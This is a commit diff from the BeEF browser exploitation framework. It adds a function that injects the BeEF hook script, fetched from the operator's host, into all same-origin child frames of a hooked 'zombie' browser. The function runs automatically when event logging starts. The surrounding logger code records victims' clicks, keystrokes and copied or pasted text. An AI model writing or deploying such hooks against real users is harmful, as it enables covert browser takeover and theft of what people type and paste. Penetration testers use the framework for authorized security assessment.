Add beef.browser.hookChildFrames()

BeEF now automatically hooks all same-domain child (i)frames Allows logging of child frame events - fixes issue #493
2013-03-18 00:37:15 +10:30
parent c98d9a4300
commit fb26ef5f71
3 changed files with 27 additions and 2 deletions
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -842,6 +842,30 @@ beef.browser = {
        return 'UNKNOWN';					// Unknown UA
    },

+    /**
+     * Hooks all child frames in the current window
+     * Restricted by same-origin policy
+     */
+    hookChildFrames:function () {
+
+        // create script object
+        var script  = document.createElement('script');
+        script.type = 'text/javascript';
+        script.src  = '<%== @beef_proto %>://<%== @beef_host %>:<%== @beef_port %><%== @hook_file %>';
+
+        // loop through child frames
+        for (var i=0;i<self.frames.length;i++) {
+            try {
+                // append hook script
+                self.frames[i].document.body.appendChild(script);
+                console.log("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
+            } catch (e) {
+                // warn on cross-domain
+                console.log("Hooking frame failed");
+            }
+        }
+    },
+
    /**
     * Checks if the zombie has flash installed and enabled.
     * @return: {Boolean} true or false.
--- a/core/main/client/logger.js
+++ b/core/main/client/logger.js
@@ -50,6 +50,7 @@ beef.logger = {
 	 */
 	start: function() {

+		beef.browser.hookChildFrames();
 		this.running = true;
 		var d = new Date();
 		this.time = d.getTime();
--- a/extensions/events/handler.rb
+++ b/extensions/events/handler.rb
@@ -52,7 +52,7 @@ module Events
        when 'click'
          result = "#{event['time']}s - [Mouse Click] x: #{event['x']} y:#{event['y']} > #{event['target']}"
        when 'focus'
-          result = "#{event['time']}s - [Focus] Browser has regained focus."
+          result = "#{event['time']}s - [Focus] Browser window has regained focus."
        when 'copy'
          result = "#{event['time']}s - [User Copied Text] \"#{event['data']}\""
        when 'cut'
@@ -60,7 +60,7 @@ module Events
        when 'paste'
          result = "#{event['time']}s - [User Pasted Text] \"#{event['data']}\""
        when 'blur'
-          result = "#{event['time']}s - [Blur] Browser has lost focus."
+          result = "#{event['time']}s - [Blur] Browser window has lost focus."
        when 'keys'
          result = "#{event['time']}s - [User Typed] \"#{event['data']}\" > #{event['target']}"
        when 'submit'